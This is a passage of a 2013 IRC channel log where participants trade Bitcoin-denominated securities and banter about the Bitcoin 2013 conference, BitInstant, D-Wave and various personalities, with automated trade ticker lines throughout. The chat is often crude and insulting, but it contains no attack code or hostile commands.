0.0007057 = 1.7473 BTC [+] May 18 21:16:01 [HAVELOCK] [ASICM] 1 @ 0.0211512 BTC [-] May 18 21:16:29 [BTCTC] [TAT.ASICMINER] 131 @ 0.020673 = 2.7082 BTC [+] May 18 21:16:33 [BTCTC] [TAT.ASICMINER] 255 @ 0.02075 = 5.2913 BTC [+] May 18 21:16:50 [BTCTC] [TAT.ASICMINER] 12 @ 0.02075 = 0.249 BTC [+] May 18 21:18:01 [MPEX] [S.MPOE] 8900 @ 0.00070662 = 6.2889 BTC [+] May 18 21:18:03 [MPEX] [S.MPOE] 12200 @ 0.00070794 = 8.6369 BTC [+] May 18 21:18:21 [BTCTC] [BITVPS] 1 @ 0.00084 BTC [-] May 18 21:20:01 [MPEX] [S.DICE] 9 @ 0.00241139 = 0.0217 BTC [+] May 18 21:20:38 [BTCTC] [BITVPS] 1 @ 0.00084 BTC [-] May 18 21:21:15 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [-] May 18 21:22:13 [BTCTC] [ASICMINER-PT] 8 @ 2.088 = 16.704 BTC [+] May 18 21:23:06 [BTCTC] [B.YABMC] 4 @ 0.017 = 0.068 BTC [+] May 18 21:28:16 Scrat not bad coinroll. May 18 21:28:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02075 BTC [+] May 18 21:29:58 mp it's coin* May 18 21:30:31 ? May 18 21:30:39 [BTCTC] [ASICMINER-PT] 1 @ 2.061001 BTC [-] May 18 21:30:39 Scrat hm ? May 18 21:30:43 he said coin May 18 21:30:57 mp it's coin, cmon already May 18 21:31:02 :) May 18 21:31:08 [BTCTC] [ASICMINER-PT] 1 @ 2.061 BTC [-] May 18 21:31:29 [BTCTC] [ASICMINER-PT] 8 @ 2.06 = 16.48 BTC [-] May 18 21:32:14 lol May 18 21:32:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.020672 = 0.0827 BTC [-] May 18 21:32:49 should rename it, May 18 21:33:08 letseatsatoshidiceslunchalreadyfuck.it May 18 21:33:19 [BTCTC] [TAT.ASICMINER] 52 @ 0.020672 = 1.0749 BTC [-] May 18 21:34:26 hi all May 18 21:34:41 my buttcoinjesus bet is... May 18 21:34:41 alloh May 18 21:34:46 o hihi May 18 21:34:53 5 hour mand tim ferriss May 18 21:34:56 *man May 18 21:35:01 [HAVELOCK] [ASICM] 2 @ 0.022 = 0.044 BTC [+] May 18 21:35:48 BitHub you take jurov's bet at 1btc ? May 18 21:35:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.0205 = 0.246 BTC [-] May 18 21:35:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.020311 = 0.2234 BTC [-] May 18 21:36:02 [HAVELOCK] [ASICM] 90 @ 0.0202 = 1.818 BTC [-] May 18 21:36:03 [HAVELOCK] [ASICM] 9 @ 0.0201 = 0.1809 BTC [-] May 18 21:36:17 [BTCTC] [TAT.ASICMINER] 100 @ 0.0203 = 2.03 BTC [-] May 18 21:36:24 [BTCTC] [ASICMINER-PT] 1 @ 2.03 BTC [-] May 18 21:36:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.0203 = 0.203 BTC [-] May 18 21:36:30 [BTCTC] [ASICMINER-PT] 1 @ 2.0182 BTC [-] May 18 21:36:39 [BTCTC] [ASICMINER-PT] 4 @ 2.01 = 8.04 BTC [-] May 18 21:38:00 mircea_popescu: May 18 21:38:43 Yahoo is gonna buy Tumblr for 1 Instagram May 18 21:38:52 lol May 18 21:39:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.020671 = 0.0413 BTC [+] May 18 21:42:33 https://bitcointalk.org/index.php?topic=209362.0 May 18 21:42:38 jeez. May 18 21:44:12 awww where is tortilla! May 18 21:45:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.020211 = 0.2021 BTC [-] May 18 21:46:07 [BTCTC] [TAT.ASICMINER] 45 @ 0.02021 = 0.9095 BTC [-] May 18 21:46:46 we can write him paper letter, maybe he's allowed to communicate that way May 18 21:47:24 lol May 18 21:53:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.0205 = 0.205 BTC [+] May 18 21:54:10 [BTCTC] [TAT.ASICMINER] 37 @ 0.020596 = 0.7621 BTC [+] May 18 21:54:32 [BTCTC] [TAT.ASICMINER] 24 @ 0.02022 = 0.4853 BTC [-] May 18 21:54:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.02021 = 0.6063 BTC [-] May 18 21:54:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [-] May 18 21:54:54 [BTCTC] [TAT.ASICMINER] 16 @ 0.02 = 0.32 BTC [-] May 18 21:57:23 mani hate bots May 18 21:57:33 man, i hate bots May 18 21:59:17 trade bots? May 18 21:59:20 yeah May 18 21:59:23 in BTCTC May 18 21:59:42 obnoxious shit May 18 21:59:42 kakobrekla so who is bitcoinomics ? May 18 21:59:51 dunno May 18 22:01:57 mircea_popescu did you hear about D-Wave? May 18 22:02:12 yeah. May 18 22:02:49 DWave - fake quantum computer, ho hum. May 18 22:02:53 [MPEX] [S.MPOE] 11374 @ 0.00070595 = 8.0295 BTC [-] May 18 22:02:55 [MPEX] [S.MPOE] 1026 @ 0.00070333 = 0.7216 BTC [-] May 18 22:03:01 [HAVELOCK] [ASICM] 1700 @ 0.0202 = 34.34 BTC [+] May 18 22:03:02 [HAVELOCK] [ASICM] 500 @ 0.0202 = 10.1 BTC [+] May 18 22:03:14 asciilifeform i was commenting about how ppl will "invest" in anything just as long as itwon't work. May 18 22:03:21 hahahaha nobody fails cause they're mean and evil. May 18 22:03:34 why, you have examples ? May 18 22:04:09 mircea_popescu: of a working one? nope. nor does anybody else. May 18 22:04:35 no lol, ofmean people. May 18 22:05:12 American bureucrats - mean, evil, failures, and - the unforgivable sin: boring on top of it all. May 18 22:05:37 asciilifeform: NASA and Google put them to the test and say they do work. MAYBE IT'S A GIANT CONSPIRACY. May 18 22:05:40 asciilifeform: you met them? May 18 22:05:44 What do you think mircea_popescu the third? May 18 22:05:59 jurov: nope. but I did read the papers. May 18 22:06:10 ya well... don't trust the papers so much May 18 22:06:10 in my imagination they are all nice, amicable and dutiful May 18 22:06:21 thestringpuller: for a very curious definition of "work", they do in fact work. May 18 22:06:23 just on wrong duty sometimes May 18 22:06:24 all bureaucrats i met are either failures, boring and evil May 18 22:06:30 or else mean and marginalized. May 18 22:06:42 i think jurov has it. May 18 22:06:46 keep in mind that NASA also tested Podkletnov's antigravity engine. May 18 22:07:46 i would say there's exactly zero difference between your average bureaucrat and your average bitcoinite, such as https://bitcointalk.org/index.php?topic=209159.msg2193424#msg2193424 May 18 22:08:10 they'll just grow up to be bureaucrats because there's nothing of practical use they can do with their time. May 18 22:08:25 I mean, I understand the hallowed tradition of building expensive smoke and mirror contraptions for the government to buy. But straight-out paper fraud is in some ways more honourable. At least the latter doesn't tie up the time and energy of people who could be doing actual, useful engineering. May 18 22:09:10 the people who could be doing something useful already are. May 18 22:09:18 the rest need to be gives something to do with their time. May 18 22:09:24 until recently we had no ipads. May 18 22:09:30 The Winklevoss twins invested 1.5 million in Bitinstant? May 18 22:09:33 geeze May 18 22:09:43 that was a while ago. May 18 22:09:46 meanwhile they fucked it up. May 18 22:09:53 how so? May 18 22:10:21 not public knowledge afaik. May 18 22:10:42 Bitinstant is still plagued with problems? May 18 22:10:52 I would think anything dependent on Gox is doomed from the start... May 18 22:11:02 [BTCTC] [BTC-TRADING-PT] 6 @ 0.2356 = 1.4136 BTC [+] May 18 22:11:16 1.5 mil is chump change. That's the cost of ~4-5 ordinary public buses. May 18 22:11:30 I find it amusing that that kind of sum gives you media bragging rights May 18 22:11:53 asciilifeform it only does in the retard land of vice interns May 18 22:11:57 who have never seen a 100 bill. May 18 22:12:02 but anyway. May 18 22:12:20 they'll be seeing plenty of 100 bills soon. in wheelbarrows. May 18 22:12:29 when a cup of coffee costs one. May 18 22:12:32 it doesn't count if you do it late. May 18 22:12:35 [BTCTC] [COGNITIVE] 1 @ 0.225001 BTC [-] May 18 22:12:43 like oral sex. fucking a broad in the mouth was bragging rights in 1913 May 18 22:12:46 not in 2013. May 18 22:12:59 [BTCTC] [COGNITIVE] 4 @ 0.225 = 0.9 BTC [-] May 18 22:13:09 behold, artists' take on bureaucracy: http://en.wikipedia.org/wiki/File:Benefits_Supervisor_Sleeping.jpg May 18 22:13:15 in Russia, the phrase "dollar millionaire" has replaced the now laughable plain "millionaire" May 18 22:13:20 expect the same with BTC? May 18 22:13:45 oh there are "hundredaires" and "thousandaires" already May 18 22:13:56 i doubt there's going to ever be a btc millionaire. May 18 22:13:59 all over the phorum May 18 22:14:09 there never was one to date afaik, and it's getting progressively harder. May 18 22:14:14 mircea_popescu: thought you were one? May 18 22:14:18 (this, of course, if you mean cash) May 18 22:14:51 not bad j. May 18 22:15:01 [HAVELOCK] [ASICM] 100 @ 0.0207 = 2.07 BTC [+] May 18 22:15:17 mircea_popescu: how about "Mr. Satoshi" (https://bitslog.wordpress.com/2013/04/17/the-well-deserved-fortune-of-satoshi-nakamoto/) ? May 18 22:15:42 mircea by the way, you should also deny that you are NOT alien with superpowers May 18 22:15:53 wait what ? May 18 22:16:09 [HAVELOCK] [ASICM] 1 @ 0.0208 BTC [+] May 18 22:16:26 asciilifeform satoshi possibly has a decent chunk of change, but in no event would it be 1mn May 18 22:16:42 and also that you are NOT several thousand years old etc. May 18 22:16:45 [BTCTC] [ASICMINER-PT] 1 @ 1.9862 BTC [-] May 18 22:17:16 [BTCTC] [ASICMINER-PT] 1 @ 1.986 BTC [-] May 18 22:17:23 [BTCTC] [ASICMINER-PT] 1 @ 1.9852 BTC [-] May 18 22:17:34 [BTCTC] [ASICMINER-PT] 1 @ 1.9812 BTC [-] May 18 22:18:18 [BTCTC] [TAT.ASICMINER] 24 @ 0.02 = 0.48 BTC [-] May 18 22:18:20 [BTCTC] [ASICMINER-PT] 1 @ 1.98 BTC [-] May 18 22:18:28 interesting article. May 18 22:18:47 so his presumption is that anyone mining with the same extra-nonce is the same person. this is a reasonably weak assumption. May 18 22:18:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.0199 = 0.1194 BTC [-] May 18 22:19:26 [BTCTC] [ASICMINER-PT] 1 @ 1.98 BTC [-] May 18 22:20:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.0199 = 0.199 BTC [-] May 18 22:21:01 [HAVELOCK] [ASICM] 1 @ 0.0207 BTC [-] May 18 22:21:02 [HAVELOCK] [ASICM] 20 @ 0.0202 = 0.404 BTC [-] May 18 22:21:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.019801 = 0.297 BTC [-] May 18 22:22:54 [BTCTC] [ASICMINER-PT] 14 @ 1.98 = 27.72 BTC [-] May 18 22:23:01 [HAVELOCK] [ASICM] 13 @ 0.02 = 0.26 BTC [-] May 18 22:23:02 [HAVELOCK] [ASICM] 1 @ 0.02 BTC [-] May 18 22:23:42 [BTCTC] [ASICMINER-PT] 1 @ 1.9802 BTC [+] May 18 22:24:01 [HAVELOCK] [SDICE] 1 @ 0.25 BTC [+] May 18 22:24:19 [BTCTC] [ASICMINER-PT] 2 @ 1.96 = 3.92 BTC [-] May 18 22:24:53 [BTCTC] [ASICMINER-PT] 1 @ 2.077989 BTC [+] May 18 22:25:38 [BTCTC] [ASICMINER-PT] 1 @ 2.077 BTC [-] May 18 22:26:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.020499 = 0.205 BTC [+] May 18 22:27:00 [HAVELOCK] [ASICM] 89 @ 0.0201 = 1.7889 BTC [+] May 18 22:27:38 [BTCTC] [TAT.ASICMINER] 65 @ 0.0205 = 1.3325 BTC [+] May 18 22:28:00 [HAVELOCK] [ASICM] 1 @ 0.0208512 BTC [+] May 18 22:29:36 [BTCTC] [TAT.ASICMINER] 25 @ 0.0205 = 0.5125 BTC [+] May 18 22:32:29 [BTCTC] [ASICMINER-PT] 1 @ 2.074898 BTC [-] May 18 22:33:00 [MPEX] [S.MPOE] 21544 @ 0.00070333 = 15.1525 BTC [-] May 18 22:33:37 [BTCTC] [ASICMINER-PT] 1 @ 2.074899 BTC [+] May 18 22:33:44 http://www.jevtrade.com/ May 18 22:33:45 hmm May 18 22:34:07 isnt this the same webpage as that other one May 18 22:36:34 srsly May 18 22:36:38 whod want to be here https://pbs.twimg.com/media/BKkGp4pCMAE6bFF.jpg:large May 18 22:38:47 JevTrade, JevTrade logo, and all other trademarks, whether registered or unregistered, are the property of Jevons, Inc. and its affiliates. May 18 22:38:54 win. they own unregistered "trademarks" May 18 22:39:06 https://twitter.com/tspyz/status/335803035198566400/photo/1 May 18 22:39:28 [BTCTC] [COGNITIVE] 2 @ 0.225 = 0.45 BTC [-] May 18 22:39:30 reminds me of bitpays guy hair May 18 22:40:02 [BTCTC] [COGNITIVE] 6 @ 0.2101 = 1.2606 BTC [-] May 18 22:40:35 [BTCTC] [COGNITIVE] 2 @ 0.210012 = 0.42 BTC [-] May 18 22:40:49 https://twitter.com/Mircea_Popescu/status/335842373357694978 May 18 22:41:44 anyway, i'm still enjoying the delightful bitcoinica scamsultancy cadaver washing in unicorn tears megapost. May 18 22:46:01 mircea_popescu: have you heard from smickles since our last discussion btw? May 18 22:46:52 nop May 18 22:49:18 apparently they have a twitter themselfs https://twitter.com/JevTrade May 18 22:52:01 [HAVELOCK] [SDICE] 30 @ 0.25 = 7.5 BTC [+] May 18 22:52:03 [HAVELOCK] [SDICE] 20 @ 0.25 = 5 BTC [+] May 18 22:52:26 [BTCTC] [ASICMINER-PT] 1 @ 2.0748 BTC [-] May 18 22:54:56 we should set up #bitcoin-synergy and arrange all such types to congregate there May 18 22:55:32 and then nuke from orbit May 18 22:56:28 >>codinginmysleep @codinginmysleep 10m May 18 22:56:28 Really need to write a post about the first half of the day but right now I need food more. May 18 22:56:32 yea i bet. May 18 22:57:18 How come bitvps has paid no dividends? May 18 22:57:48 dude, ask namworld. but last heard they are poor and they are buying a new server May 18 23:02:26 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGY4R1VxTm1YbUhEYWVKYnBfMVhZS3c May 18 23:02:32 mabie will explain it May 18 23:02:59 [MPEX] [S.MPOE] 6600 @ 0.00070794 = 4.6724 BTC [+] May 18 23:03:01 [MPEX] [S.MPOE] 3300 @ 0.00070796 = 2.3363 BTC [+] May 18 23:03:02 https://www.bitvps.com/investors links from there if you dont trust the above May 18 23:03:02 [MPEX] [S.MPOE] 10499 @ 0.00070919 = 7.4458 BTC [+] May 18 23:04:14 kakobrekla i recall during the london failference that they ended up praising the great catered food May 18 23:04:19 which showed only 3 hours late or some shit May 18 23:04:33 http://www.reddit.com/r/Bitcoin/comments/1el1y6/i_stole_the_leftovers_from_bitcoin2013_last_night/ May 18 23:04:35 there is something to be said for getting people hungry enough. they'll swallow anything May 18 23:04:44 ^ this time May 18 23:04:53 feeding the homeless May 18 23:05:06 whp May 18 23:05:09 who's sean ? May 18 23:05:30 https://twitter.com/sddimitrov/status/335847946501365761/photo/1 May 18 23:05:38 ah May 18 23:05:48 i wanted to say camera facing in wrong direction May 18 23:05:55 only then to notice the one on the left May 18 23:06:14 for the chan's amusement : mpoe-pr hath spoken. https://bitcointalk.org/index.php?topic=209362.msg2193455#msg2193455 May 18 23:07:00 also, bitfinex went into litecoins now... for better leveraged chicken drama May 18 23:08:02 http://court-record-report.com/record/1319343/2011TR003664 May 18 23:08:04 this guy ? May 18 23:11:53 ", it scares me how much of a witch hunt is going on for MtGox and I wonder if MtGox is undergoing the same treatment that the Bitcoinica Consultancy received and if those criticizing MtGox are simply doing the bidding of Tihan Seale and his friends." May 18 23:12:02 personally i thought that's the best part. May 18 23:14:38 http://imgur.com/aaYi5A1 May 18 23:15:09 [BTCTC] [PAJKA.BOND] 2 @ 0.1089 = 0.2178 BTC [-] May 18 23:15:17 totally. May 18 23:15:18 jurov, SDICE pay for this opening party :) May 18 23:15:20 [BTCTC] [PAJKA.BOND] 4 @ 0.109 = 0.436 BTC [+] May 18 23:16:32 totally. May 18 23:16:45 i need a shortcut for that. May 18 23:17:01 [HAVELOCK] [ASICM] 69 @ 0.0201 = 1.3869 BTC [-] May 18 23:17:02 [HAVELOCK] [ASICM] 6 @ 0.02 = 0.12 BTC [-] May 18 23:17:41 [BTCTC] [B.YABMC] 2 @ 0.017 = 0.034 BTC [+] May 18 23:18:47 "Patrick's mother has sacrificed a very significant amount of money helping him fight his current liquidation. " May 18 23:19:03 heh, some people don't have wives (tho not married but only regarding themselves as such) May 18 23:21:16 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] May 18 23:22:06 [BTCTC] [ASICMINER-PT] 3 @ 2 = 6 BTC [-] May 18 23:23:01 [HAVELOCK] [HIM] 2 @ 1.8 = 3.6 BTC [-] May 18 23:23:07 [BTCTC] [TAT.ASICMINER] 24 @ 0.02035 = 0.4884 BTC [-] May 18 23:23:39 [BTCTC] [ASICMINER-PT] 1 @ 2.074 BTC [+] May 18 23:23:42 1. BITCOIN 2013 - DAY1 - Peter Vessenes of Bitcoin Foundation May 18 23:23:44 http://www.youtube.com/watch?v=I6jfPXFAToM&feature=youtu.be May 18 23:24:01 [HAVELOCK] [VTX] 7 @ 0.41 = 2.87 BTC [-] May 18 23:24:13 [BTCTC] [ASICMINER-PT] 4 @ 2.074 = 8.296 BTC [+] May 18 23:24:17 Awesome, we're so cool! May 18 23:24:20 lol May 18 23:24:27 ;;title May 18 23:24:27 (title ) -- Returns the HTML ... of a URL. May 18 23:24:33 ;;title http://www.youtube.com/watch?v=I6jfPXFAToM&feature=youtu.be May 18 23:24:33 Error: This url is not on the whitelist. May 18 23:24:38 da fuck gribble May 18 23:26:45 omg this vessenes guy "bankers are here wooohoo" May 18 23:27:01 [HAVELOCK] [ASICM] 69 @ 0.0207 = 1.4283 BTC [+] May 18 23:28:01 [HAVELOCK] [ASICM] 131 @ 0.0207512 = 2.7184 BTC [+] May 18 23:29:08 mircea_popescu: where was that quote from? May 18 23:29:25 the above linked btctalk thread May 18 23:30:01 [HAVELOCK] [ASICM] 10 @ 0.0207512 = 0.2075 BTC [+] May 18 23:30:03 [HAVELOCK] [ASICM] 2 @ 0.0207512 = 0.0415 BTC [+] May 18 23:31:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.26 BTC [+] May 18 23:31:56 who is bitcoinomics? May 18 23:32:00 [HAVELOCK] [ASICM] 356 @ 0.0207512 = 7.3874 BTC [+] May 18 23:32:02 [HAVELOCK] [ASICM] 10 @ 0.0207512 = 0.2075 BTC [+] May 18 23:32:56 you are the 2nd person to ask May 18 23:32:59 dunno May 18 23:33:15 o a bunch of stuff here http://www.youtube.com/user/digitalmagus7?feature=watch May 18 23:33:30 ugh May 18 23:33:41 he keeps joking about btc is making everyone rish May 18 23:33:44 rich May 18 23:33:51 and worth so much May 18 23:33:51 yes stupid May 18 23:34:21 oh no the winklesvoss twins are there May 18 23:34:24 lol May 18 23:34:28 http://www.youtube.com/watch?v=QX-blY0Gv3o May 18 23:34:38 watching now May 18 23:35:55 who is gandhi? May 18 23:36:00 [HAVELOCK] [ASICM] 12 @ 0.0207512 = 0.249 BTC [+] May 18 23:37:50 google ninja turtles May 18 23:37:52 done May 18 23:38:49 [BTCTC] [ASICMINER-PT] 1 @ 2.074 BTC [+] May 18 23:39:01 [HAVELOCK] [ASICM] 1 @ 0.0207512 BTC [+] May 18 23:39:02 [HAVELOCK] [ASICM] 9 @ 0.0207 = 0.1863 BTC [-] May 18 23:40:00 [HAVELOCK] [ASICM] 1 @ 0.0207512 BTC [+] May 18 23:40:01 [HAVELOCK] [ASICM] 45 @ 0.0208 = 0.936 BTC [+] May 18 23:40:03 [HAVELOCK] [ASICM] 8 @ 0.0208512 = 0.1668 BTC [+] May 18 23:40:16 "the cyprus effect" May 18 23:40:32 otherwise known as a big old bubble May 18 23:40:33 if he says 'um' one more time.. May 18 23:40:37 i know... May 18 23:40:50 lol truf May 18 23:41:00 [HAVELOCK] [HIM] 1 @ 1.8 BTC [-] May 18 23:41:30 get a web enabled rifle and charge btc to shoot paintballs at speakers. patent pending. May 18 23:41:31 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [-] May 18 23:42:27 [BTCTC] [PAJKA.BOND] 1 @ 0.1042 BTC [-] May 18 23:42:31 [BTCTC] [PAJKA.BOND] 2 @ 0.1041 = 0.2082 BTC [-] May 18 23:43:00 lol recall how incensed casacsius was about amir's ums ? May 18 23:43:15 here free domain: http://www.youtube.com/watch?v=bjw0BROSDnI May 18 23:43:28 [BTCTC] [PAJKA.BOND] 7 @ 0.104 = 0.728 BTC [-] May 18 23:43:34 do these guys ever age? May 18 23:43:41 the look 21 May 18 23:43:44 they* May 18 23:44:21 you age by having sex May 18 23:44:24 (with a woman) May 18 23:44:43 so I can be immortal by having sex with men? May 18 23:44:56 no thanks. May 18 23:44:59 lol May 18 23:45:21 death is a key part of my golden parachute May 18 23:45:23 not immortal May 18 23:45:25 i'm banking on it May 18 23:45:35 immortality requires having sex with your twin brother May 18 23:45:40 sister. May 18 23:45:43 no wait May 18 23:45:47 hehe May 18 23:45:50 your twin mother. May 18 23:45:59 that crashes the api May 18 23:46:00 don't talk about my momma, mp May 18 23:46:04 even if she is a twin momma May 18 23:46:07 not yours May 18 23:46:08 his May 18 23:46:25 pull the other one May 18 23:46:41 video 3 is getting into super useless territory May 18 23:46:45 cmon guys May 18 23:46:56 http://www.youtube.com/watch?v=s5In1uBWcHg May 18 23:46:57 i can't follow any of this 'conference' bullshit. May 18 23:47:02 theres a walkaround May 18 23:47:09 i was hoping one of you might be suckered into summarizing it for me May 18 23:47:10 there is more noise than there is presentation. May 18 23:47:16 i can May 18 23:47:20 so far May 18 23:47:26 shrimp canape ? May 18 23:47:33 Video 1 = You are cool because you think bitcoin is cool May 18 23:47:41 o hey! reddit! May 18 23:47:44 Video 2 = Trust us. bitcoin is cool May 18 23:47:53 um. May 18 23:47:59 deep. May 18 23:48:27 Video 3 (so far) = Even though people say bitcoin is not cool, it is May 18 23:49:33 ripple booth is packed with salesman May 18 23:49:35 awesome May 18 23:50:13 why not saleswomen May 18 23:50:14 wtf. May 18 23:50:31 coinbase has a .01 btc faucet at booth May 18 23:50:33 lol May 18 23:50:50 coinlab has chocolate bitcoins May 18 23:51:25 i had free champagne. May 18 23:51:30 lotsa payment processors and wallet makers May 18 23:53:42 how is coinlab supposed to fuck you if you are behind them tho? May 18 23:54:29 [BTCTC] [ASICMINER-PT] 1 @ 2.050005 BTC [-] May 18 23:54:37 [BTCTC] [ASICMINER-PT] 1 @ 2.050004 BTC [-] May 18 23:56:00 twins "dont want to fight, we wanna make a better world" May 18 23:56:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.230001 BTC [-] May 18 23:57:00 [HAVELOCK] [HIM] 1 @ 1.8 BTC [-] May 18 23:57:36 truffles, envious? May 18 23:57:58 not of the presentation, of the adoption date. May 18 23:58:03 jerks May 18 23:58:33 twins wanna know who is gonna step up and set up btc sending over voip May 18 23:58:46 bah. i know better ways to enjoy my % of both bitcoin and its asset market than to make jerk of myself May 18 23:59:01 it's only in my head May 18 23:59:03 ain't real May 18 23:59:03 [BTCTC] [BITVPS] 1 @ 0.00084 BTC [-] May 18 23:59:27 kind of a joke really May 18 23:59:55 "bitcoin never sleeps, it knows no borders" May 19 00:00:54 yes. and nobody expects the spanish inquisition. May 19 00:01:02 twins are going VERY weird about it if they don't want to fight. May 19 00:01:05 for one, they're not here. May 19 00:01:32 but we fight all the time May 19 00:01:43 ;;slap ThickAsThieves May 19 00:02:18 ya but this is nothing. May 19 00:03:00 [HAVELOCK] [ASICM] 14 @ 0.0208 = 0.2912 BTC [-] May 19 00:03:36 [MPEX] [S.DICE] 2000 @ 0.00241139 = 4.8228 BTC [+] May 19 00:04:00 [HAVELOCK] [ASICM] 31 @ 0.0208 = 0.6448 BTC [-] May 19 00:04:01 [HAVELOCK] [ASICM] 1 @ 0.0207 BTC [-] May 19 00:04:14 you lose vision and hearing watching that May 19 00:05:21 [BTCTC] [ESECURITYSABTC] 1 @ 0.25001 BTC [+] May 19 00:05:30 free wifi by satoshidice May 19 00:05:45 sign has a new logo May 19 00:05:58 man head with bursting brain May 19 00:06:03 [BTCTC] [ESECURITYSABTC] 1 @ 0.25 BTC [-] May 19 00:06:42 5m May 19 00:06:43 (I'm at a regulatory talk at #bitcoin2013, mostly revolving around keeping data from authorities right now.) May 19 00:06:44 lol May 19 00:06:44 bfl has miners running thru ipad May 19 00:07:32 ;;eightball did erik successfully lull the shareholders herd ? May 19 00:07:33 Come again? May 19 00:07:38 ;;eightball did erik successfully lull the shareholders herd? May 19 00:07:39 No. May 19 00:08:10 no significant s.dice movement either, too May 19 00:09:04 imagine that May 19 00:09:16 that sums up all the vids so far May 19 00:09:21 nothing of substance May 19 00:09:32 did gavin have a speech ? May 19 00:09:38 ppl are like asking me on twitter what's my take May 19 00:09:43 im like dunno dude, i don't wathc vids May 19 00:09:47 if so May 19 00:09:49 no vid yet May 19 00:12:18 [BTCTC] [ESECURITYSABTC] 1 @ 0.255001 BTC [+] May 19 00:12:37 [BTCTC] [COGNITIVE] 1 @ 0.234997 BTC [+] May 19 00:14:27 @jonmatonis 24s May 19 00:14:27 EU is at least 5 years ahead of U.S. with e-Money Directive and acceptance of online gaming. May 19 00:15:00 [HAVELOCK] [ASICM] 59 @ 0.0201 = 1.1859 BTC [-] May 19 00:15:02 [HAVELOCK] [ASICM] 200 @ 0.02 = 4 BTC [-] May 19 00:15:24 @GamingCounsel 2m May 19 00:15:24 Cutler: FinCEN's guidance on virtual currencies does not reflect the reality of what virtual currencies are. May 19 00:15:26 lulz May 19 00:15:45 [BTCTC] [ASICMINER-PT] 1 @ 2.066599 BTC [+] May 19 00:16:45 [BTCTC] [ESECURITYSABTC] 1 @ 0.265 BTC [+] May 19 00:16:48 more like 10-20years ahead. May 19 00:19:24 truffles and? May 19 00:19:34 [BTCTC] [ESECURITYSABTC] 1 @ 0.25897 BTC [-] May 19 00:21:13 http://thebitcoinwife.files.wordpress.com/2013/05/image-4.jpeg May 19 00:22:02 http://thebitcoinwife.files.wordpress.com/2013/05/image-3.jpeg May 19 00:22:13 [BTCTC] [ESECURITYSABTC] 1 @ 0.299999 BTC [+] May 19 00:22:37 cool package May 19 00:22:42 very May 19 00:23:21 is the thing in the plastic bottle on the left actual neft ? May 19 00:23:23 ie, gasoline ? May 19 00:23:35 lol dunno May 19 00:24:38 ;;bc,stats May 19 00:24:40 Current Blocks: 236808 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 1079 blocks | Next Difficulty In About: 1 week, 0 days, 13 hours, 5 minutes, and 27 seconds | Next Difficulty Estimate: 11951550.617 | Estimated Percent Change: 6.83182 May 19 00:25:17 neft is made in austria really. May 19 00:25:46 ;;nethash May 19 00:25:47 83294.2840979 May 19 00:25:52 wasn't it some guy erik had met or w/e May 19 00:26:10 forgot the details. May 19 00:26:19 i thought you knew him May 19 00:28:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.020001 = 0.2 BTC [-] May 19 00:28:07 [BTCTC] [TAT.ASICMINER] 17 @ 0.02 = 0.34 BTC [-] May 19 00:30:21 vagiuely May 19 00:30:25 but iirc he was russian May 19 00:32:39 [BTCTC] [ASICMINER-PT] 1 @ 2.0666 BTC [+] May 19 00:33:26 someone fix this https://twitter.com/thams/status/335869778944200706 May 19 00:34:32 http://instagram.com/p/Zd9Fe-mo6f/# May 19 00:34:40 ^^win^^ May 19 00:38:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.020349 = 0.2035 BTC [+] May 19 00:39:09 they are back May 19 00:39:17 hence their amazine resilience May 19 00:39:21 g May 19 00:42:18 i'd be embarassed tho May 19 00:43:31 it's incredible. May 19 00:43:40 that guy is a known scammer, he actually gets welcomed ?! May 19 00:43:55 i think i might've emptied Havelock's hot wallet May 19 00:44:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02035 BTC [+] May 19 00:45:21 -assets should have a boot there May 19 00:45:25 with a few irc terminals May 19 00:45:43 booth May 19 00:46:04 notrly. May 19 00:46:17 yeah, i'm scared enough of mp tweeting the location May 19 00:47:16 i can't imagine how would that work May 19 00:47:38 why not, this chan is better than some of the stuff thats there May 19 00:47:43 it is May 19 00:48:00 so why invite bitcoin worshippers and salesmen May 19 00:48:19 so they can learn? May 19 00:48:26 kakobrekla, lend a projector and stream us to some exposed wall May 19 00:48:32 [BTCTC] [GSDPT] 4 @ 0.002789 = 0.0112 BTC [+] May 19 00:48:36 lol jurov May 19 00:48:47 or, even better, hack a projector :DDD May 19 00:48:48 [BTCTC] [GSDPT] 31 @ 0.00279 = 0.0865 BTC [+] May 19 00:48:51 i dun want the other end of my terminal soiled by contact with jared kenna May 19 00:48:54 like a mystery science theater May 19 00:49:02 [BTCTC] [GSDPT] 2 @ 0.00279 = 0.0056 BTC [+] May 19 00:49:07 goat is good enough. May 19 00:49:15 mircea_popescu he wouldnt have joined anyway May 19 00:49:16 [BTCTC] [GSDPT] 85 @ 0.002823 = 0.24 BTC [+] May 19 00:49:40 a ok May 19 00:49:48 [BTCTC] [GSDPT] 56 @ 0.002827 = 0.1583 BTC [+] May 19 00:49:58 so then here's a thought : we already have a booth there May 19 00:50:03 on everyone's smartphone. May 19 00:50:04 [BTCTC] [GSDPT] 32 @ 0.002828 = 0.0905 BTC [+] May 19 00:50:15 btw, i just checked satoshidice.com and there's *no* mention that it sells shares at all May 19 00:50:18 just they dont know it yet May 19 00:50:37 jurov thats an interesting point May 19 00:50:51 i'm gonna annoy evoor till he fixes that May 19 00:51:07 imho he trys to keep it low cause of regolatory issues May 19 00:51:12 or you can personally if he's around May 19 00:51:13 [BTCTC] 